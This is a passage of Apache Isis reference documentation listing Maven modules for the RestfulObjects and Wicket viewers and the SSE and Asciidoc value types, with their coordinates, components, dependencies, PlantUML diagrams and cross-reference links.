xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/CollectionDescriptionRepresentation.adoc[CollectionDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/DomainTypeRepresentation.adoc[DomainTypeRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/DomainTypeResource.adoc[DomainTypeResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/PropertyDescriptionRepresentation.adoc[PropertyDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/TypeActionResultRepresentation.adoc[TypeActionResultRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/TypeListRepresentation.adoc[TypeListRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/dtos\/ScalarValueDtoV2.adoc[ScalarValueDtoV2], xref:refguide:viewer:index\/restfulobjects\/applib\/errors\/ErrorRepresentation.adoc[ErrorRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/health\/HealthRepresentation.adoc[HealthRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/health\/HealthResource.adoc[HealthResource], xref:refguide:viewer:index\/restfulobjects\/applib\/homepage\/HomePageRepresentation.adoc[HomePageRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/homepage\/HomePageResource.adoc[HomePageResource], xref:refguide:viewer:index\/restfulobjects\/applib\/menubars\/MenuBarsResource.adoc[MenuBarsResource], xref:refguide:viewer:index\/restfulobjects\/applib\/user\/UserRepresentation.adoc[UserRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/user\/UserResource.adoc[UserResource], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/JsonMapper.adoc[JsonMapper], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/JsonNodeUtils.adoc[JsonNodeUtils], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/MediaTypes.adoc[MediaTypes], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/Parser.adoc[Parser], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/PathNode.adoc[PathNode], 
xref:refguide:viewer:index\/restfulobjects\/applib\/util\/UrlEncodingUtils.adoc[UrlEncodingUtils], xref:refguide:viewer:index\/restfulobjects\/applib\/version\/VersionRepresentation.adoc[VersionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/version\/VersionResource.adoc[VersionResource]\n****\n\n|Apache Isis Viewer - RO (JAX-RS Resteasy v4)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-jaxrsresteasy4\nType: jar\nDirectory: \/viewers\/restfulobjects\/jaxrs-resteasy-4\n----\n|JAX-RS plugin using jboss resteasy.\n\n.Components\n****\no.a.i.viewer.restfulobjects.jaxrsresteasy4.conneg.RestfulObjectsJaxbWriterForXml +\no.a.i.viewer.restfulobjects.jaxrsresteasy4.webmodule.WebModuleJaxrsResteasy4 +\n****\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-restfulobjects-rendering:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-testing:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-viewer:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.jboss.resteasy:resteasy-jaxb-provider:jar:<managed> +\norg.jboss.resteasy:resteasy-spring-boot-starter:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/jaxrsresteasy4\/IsisModuleViewerRestfulObjectsJaxrsResteasy4.adoc[IsisModuleViewerRestfulObjectsJaxrsResteasy4], xref:refguide:viewer:index\/restfulobjects\/jaxrsresteasy4\/conneg\/RestfulObjectsJaxbWriterForXml.adoc[RestfulObjectsJaxbWriterForXml], xref:refguide:viewer:index\/restfulobjects\/jaxrsresteasy4\/webmodule\/WebModuleJaxrsResteasy4.adoc[WebModuleJaxrsResteasy4]\n****\n\n|Apache Isis Viewer - RO (Rendering)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-rendering\nType: jar\nDirectory: \/viewers\/restfulobjects\/rendering\n----\n|.Components\n****\no.a.i.viewer.restfulobjects.rendering.domainobjects.JsonValueEncoder +\no.a.i.viewer.restfulobjects.rendering.service.RepresentationService +\no.a.i.viewer.restfulobjects.rendering.service.acceptheader.AcceptHeaderServiceForRest +\no.a.i.viewer.restfulobjects.rendering.service.acceptheader.AcceptHeaderServiceForRest$RequestFilter +\no.a.i.viewer.restfulobjects.rendering.service.acceptheader.AcceptHeaderServiceForRest$ResponseFilter +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceForRestfulObjectsV1_0 +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceOrgApacheIsisV1 +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceOrgApacheIsisV2 +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceXRoDomainType +\no.a.i.viewer.restfulobjects.rendering.service.swagger.SwaggerServiceDefault +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.ClassExcluderDefault +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.SwaggerSpecGenerator +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.TaggerDefault +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.ValuePropertyFactoryDefault +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/rendering\/IResourceContext.adoc[IResourceContext], 
xref:refguide:viewer:index\/restfulobjects\/rendering\/IsisModuleRestfulObjectsRendering.adoc[IsisModuleRestfulObjectsRendering], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/RepresentationService.adoc[RepresentationService], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/acceptheader\/AcceptHeaderServiceForRest.adoc[AcceptHeaderServiceForRest], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationService.adoc[ContentNegotiationService], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceAbstract.adoc[ContentNegotiationServiceAbstract], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceForRestfulObjectsV1_0.adoc[ContentNegotiationServiceForRestfulObjectsV1_0], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceOrgApacheIsisV1.adoc[ContentNegotiationServiceOrgApacheIsisV1], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceOrgApacheIsisV2.adoc[ContentNegotiationServiceOrgApacheIsisV2], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceXRoDomainType.adoc[ContentNegotiationServiceXRoDomainType], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/swagger\/SwaggerServiceMenu.adoc[SwaggerServiceMenu]\n****\n\n|Apache Isis Viewer - RO (Testing)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-testing\nType: jar\nDirectory: \/viewers\/restfulobjects\/testing\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-viewer:jar:<managed> +\n****\n\n|Apache Isis Viewer - RO (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-viewer\nType: jar\nDirectory: \/viewers\/restfulobjects\/viewer\n----\n|.Components\n****\no.a.i.viewer.restfulobjects.viewer.mappers.ExceptionMapperForObjectNotFound +\no.a.i.viewer.restfulobjects.viewer.mappers.ExceptionMapperForRestfulObjectsApplication +\no.a.i.viewer.restfulobjects.viewer.mappers.ExceptionMapperForRuntimeException +\no.a.i.viewer.restfulobjects.viewer.resources.DomainObjectResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.DomainServiceResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.DomainTypeResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.HomePageResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.ImageResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.MenuBarsResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.SwaggerSpecResource +\no.a.i.viewer.restfulobjects.viewer.resources.UserResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.VersionResourceServerside +\n****\n\n.Dependencies\n****\ncom.fasterxml.jackson.module:jackson-module-jaxb-annotations:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-rendering:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n.Document Index 
Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/viewer\/IsisModuleViewerRestfulObjectsViewer.adoc[IsisModuleViewerRestfulObjectsViewer]\n****\n|===\n\n=== Wicket\n\n[plantuml,Wicket,svg]\n----\n@startuml(id=Wicket)\ntitle Wicket - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Wicket\\n[Software System]\" {\n rectangle \"==Apache Isis Viewer - Wicket\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Viewer - Wicket (Model)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Viewer - Wicket (UI Components)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Viewer - Wicket (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n@enduml\n----\n.Projects\/Modules (Wicket)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Viewer - Wicket\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket\nType: pom\nDirectory: \/viewers\/wicket\n----\n|\n\n|Apache Isis Viewer - Wicket (Model)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket-model\nType: jar\nDirectory: \/viewers\/wicket\/model\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.apache.wicket:wicket-core:jar:<managed> +\norg.apache.wicket:wicket-extensions:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/wicket\/model\/IsisModuleViewerWicketModel.adoc[IsisModuleViewerWicketModel]\n****\n\n|Apache Isis Viewer - Wicket (UI Components)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket-ui\nType: jar\nDirectory: \/viewers\/wicket\/ui\n----\n|.Components\n****\no.a.i.viewer.wicket.ui.app.logout.LogoutHandlerWkt +\no.a.i.viewer.wicket.ui.components.widgets.themepicker.IsisWicketThemeSupportDefault +\n****\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-extensions:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-themes:jar:<managed> +\nde.agilecoders.wicket.webjars:wicket-webjars:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-model:jar:<managed> +\norg.apache.wicket:wicket-auth-roles:jar:<managed> +\norg.apache.wicket:wicket-core:jar:<managed> +\norg.apache.wicket:wicket-devutils:jar:<managed> +\norg.apache.wicket:wicket-extensions:jar:<managed> +\norg.apache.wicket:wicket-spring:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.slf4j:slf4j-api:jar:${slf4j-api.version} +\norg.webjars:jquery-ui:jar:<managed> +\norg.webjars:select2:jar:<managed> 
+\norg.webjars.bower:summernote:jar:<managed> +\norg.wicketstuff:wicketstuff-select2:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/wicket\/ui\/IsisModuleViewerWicketUi.adoc[IsisModuleViewerWicketUi]\n****\n\n|Apache Isis Viewer - Wicket (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket-viewer\nType: jar\nDirectory: \/viewers\/wicket\/viewer\n----\n|.Components\n****\no.a.i.viewer.wicket.viewer.registries.components.ComponentFactoryRegistrarDefault +\no.a.i.viewer.wicket.viewer.registries.components.ComponentFactoryRegistryDefault +\no.a.i.viewer.wicket.viewer.registries.pages.PageClassListDefault +\no.a.i.viewer.wicket.viewer.registries.pages.PageClassRegistryDefault +\no.a.i.viewer.wicket.viewer.registries.pages.PageNavigationServiceDefault +\no.a.i.viewer.wicket.viewer.services.BookmarkUiServiceWicket +\no.a.i.viewer.wicket.viewer.services.DeepLinkServiceWicket +\no.a.i.viewer.wicket.viewer.services.HintStoreUsingWicketSession +\no.a.i.viewer.wicket.viewer.services.ImageResourceCacheClassPath +\no.a.i.viewer.wicket.viewer.services.LocaleProviderWicket +\no.a.i.viewer.wicket.viewer.services.TranslationsResolverWicket +\no.a.i.viewer.wicket.viewer.services.WicketViewerSettingsDefault +\no.a.i.viewer.wicket.viewer.services.mementos.ObjectMementoServiceWicket +\no.a.i.viewer.wicket.viewer.webmodule.WebModuleWicket +\n****\n\n.Dependencies\n****\ncommons-io:commons-io:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\nnet.ftlines.wicket-source:wicket-source:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\norg.apache.wicket:wicket-auth-roles:jar:<managed> +\norg.apache.wicket:wicket-spring:jar:<managed> +\norg.jmock:jmock-junit4:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/wicket\/viewer\/IsisModuleViewerWicketViewer.adoc[IsisModuleViewerWicketViewer], xref:refguide:viewer:index\/wicket\/viewer\/mixins\/Object_clearHints.adoc[Object_clearHints]\n****\n|===\n\n== Valuetypes\n\n[plantuml,Valuetypes,svg]\n----\n@startuml(id=Valuetypes)\ntitle Valuetypes - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Valuetypes\\n[Software System]\" {\n rectangle \"==Apache Isis Val - SSE (ui)\\n<size:10>[Container: packaging: pom]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Val - Server Sent Events\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Val - Server Sent Events (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Val - Server Sent Events (parent)\\n<size:10>[Container: 
packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Val - Server Sent Events (ui wicket)\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Value types\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n6 .[#707070].> 7 : \"\"\n3 .[#707070].> 6 : \"\"\n3 .[#707070].> 4 : \"\"\n3 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Valuetypes)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Value types\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes\nType: pom\nDirectory: \/valuetypes\n----\n|Value types for use within Apache Isis applications.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Val - Server Sent Events (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse\nType: pom\nDirectory: \/valuetypes\/sse\n----\n|Dynamically updating HTML markup\n\n|Apache Isis Val - Server Sent Events\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-applib\nType: jar\nDirectory: \/valuetypes\/sse\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/sse\/applib\/IsisModuleValSseApplib.adoc[IsisModuleValSseApplib], xref:refguide:valuetypes:index\/sse\/applib\/annotations\/ServerSentEvents.adoc[ServerSentEvents], xref:refguide:valuetypes:index\/sse\/applib\/annotations\/SseSource.adoc[SseSource], xref:refguide:valuetypes:index\/sse\/applib\/service\/SseChannel.adoc[SseChannel], xref:refguide:valuetypes:index\/sse\/applib\/service\/SseService.adoc[SseService]\n****\n\n|Apache Isis Val - Server Sent Events (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-metamodel\nType: jar\nDirectory: \/valuetypes\/sse\/metamodel\n----\n|.Components\n****\no.a.i.valuetypes.sse.metamodel.facets.SseAnnotationFacetFactory$Register +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-applib:jar:<managed> +\n****\n\n|Apache Isis Val - SSE (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-ui\nType: pom\nDirectory: \/valuetypes\/sse\/ui\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-applib:jar:<managed> +\n****\n\n|Apache Isis Val - Server Sent Events (ui wicket)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-ui-wkt\nType: jar\nDirectory: \/valuetypes\/sse\/ui\/wicket\n----\n|.Components\n****\no.a.i.valuetypes.sse.ui.wkt.markup.ListeningMarkupPanelFactoriesForWicket$Parented +\no.a.i.valuetypes.sse.ui.wkt.markup.ListeningMarkupPanelFactoriesForWicket$Standalone +\no.a.i.valuetypes.sse.ui.wkt.services.SseServiceDefault +\no.a.i.valuetypes.sse.ui.wkt.webmodule.WebModuleServerSentEvents +\n****\n\n.Dependencies\n****\norg.apache.isis.valuetypes:isis-valuetypes-sse-metamodel:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/sse\/ui\/wkt\/IsisModuleValSseUiWkt.adoc[IsisModuleValSseUiWkt], 
xref:refguide:valuetypes:index\/sse\/ui\/wkt\/services\/SseServiceDefault.adoc[SseServiceDefault], xref:refguide:valuetypes:index\/sse\/ui\/wkt\/webmodule\/WebModuleServerSentEvents.adoc[WebModuleServerSentEvents]\n****\n|===\n\n=== Asciidoc\n\n[plantuml,Asciidoc,svg]\n----\n@startuml(id=Asciidoc)\ntitle Asciidoc - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Asciidoc\\n[Software System]\" {\n rectangle \"==Apache Isis Val - Asciidoctor (MetaModel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Val - Asciidoctor (Persistence)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Val - Asciidoctor (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Val - Asciidoctor (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Val - Asciidoctor (persistence jdo DN5)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Val - Asciidoctor (ui vaadin)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Val - Asciidoctor (ui wicket)\\n<size:10>[Container: packaging: jar]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Val - Asciidoctor (ui)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n}\n5 .[#707070].> 6 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n7 .[#707070].> 9 : \"\"\n@enduml\n----\n.Projects\/Modules (Asciidoc)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Val - Asciidoctor (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc\nType: pom\nDirectory: \/valuetypes\/asciidoc\n----\n|Asciidoc value type.\n\n|Apache Isis Val - Asciidoctor (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-applib\nType: jar\nDirectory: \/valuetypes\/asciidoc\/applib\n----\n|.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.asciidoctor:asciidoctorj-api:jar:${asciidoctorj.version} +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/applib\/IsisModuleValAsciidocApplib.adoc[IsisModuleValAsciidocApplib], xref:refguide:valuetypes:index\/asciidoc\/applib\/jaxb\/AsciiDocJaxbAdapter.adoc[AsciiDocJaxbAdapter], xref:refguide:valuetypes:index\/asciidoc\/applib\/value\/AsciiDoc.adoc[AsciiDoc]\n****\n\n|Apache Isis Val - 
Asciidoctor (MetaModel)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-metamodel\nType: jar\nDirectory: \/valuetypes\/asciidoc\/metamodel\n----\n|.Components\n****\no.a.i.valuetypes.asciidoc.metamodel.AsciiDocMetaModelRefiner +\no.a.i.valuetypes.asciidoc.metamodel.AsciiDocValueTypeProvider +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/metamodel\/IsisModuleValAsciidocMetaModel.adoc[IsisModuleValAsciidocMetaModel]\n****\n\n|Apache Isis Val - Asciidoctor (Persistence)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-persistence\nType: pom\nDirectory: \/valuetypes\/asciidoc\/persistence\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-applib:jar:<managed> +\n****\n\n|Apache Isis Val - Asciidoctor (persistence jdo DN5)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-persistence-jdo-dn5\nType: jar\nDirectory: \/valuetypes\/asciidoc\/persistence\/jdo-dn5\n----\n|.Dependencies\n****\norg.datanucleus:datanucleus-core:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/persistence\/jdo\/dn5\/IsisModuleValAsciidocPersistenceJdoDn5.adoc[IsisModuleValAsciidocPersistenceJdoDn5], xref:refguide:valuetypes:index\/asciidoc\/persistence\/jdo\/dn5\/converters\/IsisAsciiDocConverter.adoc[IsisAsciiDocConverter]\n****\n\n|Apache Isis Val - Asciidoctor (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-ui\nType: pom\nDirectory: \/valuetypes\/asciidoc\/ui\n----\n|.Dependencies\n****\ncom.github.jnr:jnr-constants:jar:0.10.1 +\ncom.github.jnr:jnr-enxio:jar:0.32.4 +\ncom.github.jnr:jnr-posix:jar:3.1.5 +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-applib:jar:<managed> +\norg.asciidoctor:asciidoctorj:jar:${asciidoctorj.version} +\n****\n\n|Apache Isis Val - Asciidoctor (ui vaadin)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-ui-vaa\nType: jar\nDirectory: \/valuetypes\/asciidoc\/ui\/vaadin\n----\n|.Components\n****\no.a.i.valuetypes.asciidoc.ui.vaa.components.AsciiDocFieldFactoryVaa +\n****\n\n.Dependencies\n****\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-ui:jar:${project.version} +\n****\n\n|Apache Isis Val - Asciidoctor (ui wicket)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-ui-wkt\nType: jar\nDirectory: \/valuetypes\/asciidoc\/ui\/wicket\n----\n|.Components\n****\no.a.i.valuetypes.asciidoc.ui.wkt.components.AsciiDocPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.AsciiDocPanelFactoriesWkt$Standalone +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.chg.v2.ChangesDtoPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.chg.v2.ChangesDtoPanelFactoriesWkt$Standalone +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.cmd.v2.CommandDtoPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.cmd.v2.CommandDtoPanelFactoriesWkt$Standalone +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.ixn.v2.InteractionDtoPanelFactoriesWkt$Parented 
